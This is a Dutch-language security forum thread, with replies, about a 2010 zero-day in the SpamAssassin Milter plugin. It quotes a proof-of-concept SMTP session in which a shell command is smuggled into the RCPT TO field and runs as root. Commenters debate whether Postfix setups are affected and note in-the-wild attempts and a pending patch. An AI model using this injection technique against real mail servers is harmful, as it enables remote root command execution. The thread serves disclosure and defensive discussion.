Security Professionals - ipfw add deny all from eindgebruikers to any

0day in Spamassassin Milter

07-03-2010, 23:44 door Bitwiper, 6 reacties
Op 2010-03-07 19:17:14 GMT heeft Kingcope een nogal scary uitziende 0day gepost voor de Spamassassin Milter Plugin, zie http://lists.grok.org.uk/pipermail/full-disclosure/2010-March/073489.html:
If spamass-milter is run with the expand flag (-x option) it runs a popen() including the attacker supplied recipient (RCPT TO).
Onderaan zijn post is duidelijk te zien dat een aanvaller elk gewenst commando als root kan uitvoeren:
$ nc localhost 25
220 ownthabox ESMTP Postfix (Ubuntu)
mail from: me at me.com
250 2.1.0 Ok
rcpt to: root+:"|touch /tmp/foo"
250 2.1.5 Ok

$ ls -la /tmp/foo
-rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo
De laatste SpamAssassin Milter sources dateren van 20060405 (zie http://savannah.nongnu.org/projects/spamass-milt/).

Dit type attack lijkt overigens niet nieuw, in http://www.milw0rm.com/exploits/4761 (medio 2007) is ongeveer hetzelfde te zien voor clamav-milter (zie ook http://securitytracker.com/alerts/2007/Aug/1018610.html). Ook daar werd op een onveilige manier gebruik gemaakt van popen().
Reacties (6)
08-03-2010, 08:42 door Anoniem
*phew*
rcpt to: root+:"|touch /tmp/foo"
550 5.7.1 root+:"|touch /tmp/foo"... Cannot mail directly to programs
08-03-2010, 09:22 door ej__
Hmmm milter is _alleen_ voor sendmail. In het bovengenoemde stukje claimt de mailserver postfix te zijn.

Deze exploit geprobeerd in een postfix/spamassassin combinatie en er gebeurt uiteraard niets.
</tmp/foo@mail.foo.bar>: unknown user: "/tmp/foo"

Scary stuff, dat wel. Maar ja, sendmail he...

EJ
08-03-2010, 11:00 door s.stok
Dit is de reden waarom een mailserver niet onder root behoord te draaien.
Met Amavisd-new en Postfix geen problemen.
08-03-2010, 12:48 door Anoniem
Door ej__: Hmmm milter is _alleen_ voor sendmail.

Postfix heeft ook een milter interface.

http://www.postfix.com/MILTER_README.html
08-03-2010, 18:28 door ej__
Door Anoniem:
Door ej__: Hmmm milter is _alleen_ voor sendmail.

Postfix heeft ook een milter interface.

http://www.postfix.com/MILTER_README.html

Klopt, echter:

<quote>
When you use the before-queue content filter for incoming SMTP mail (see SMTPD_PROXY_README), Milter applications have access only to the SMTP command information; they have no access to the message header or body, and cannot make modifications to the message or to the envelope.
</quote>

Daarmee is de miter niet echt handig, en afgezien daarvan: spamassassin integratie in postfix kan veel beter en sneller (master.cf)... Tevens loopt postfix niet onder root in een normale (default) installatie.

EJ
15-03-2010, 13:01 door Bitwiper
Pogingen worden ITW (in the wild) waargenomen, zie http://isc.sans.org/diary.html?storyid=8434.

Aanvulling 13:06, er wordt aan een patch gewerkt, zie http://savannah.nongnu.org/bugs/?29136.
Reageren

Deze posting is gelocked. Reageren is niet meer mogelijk.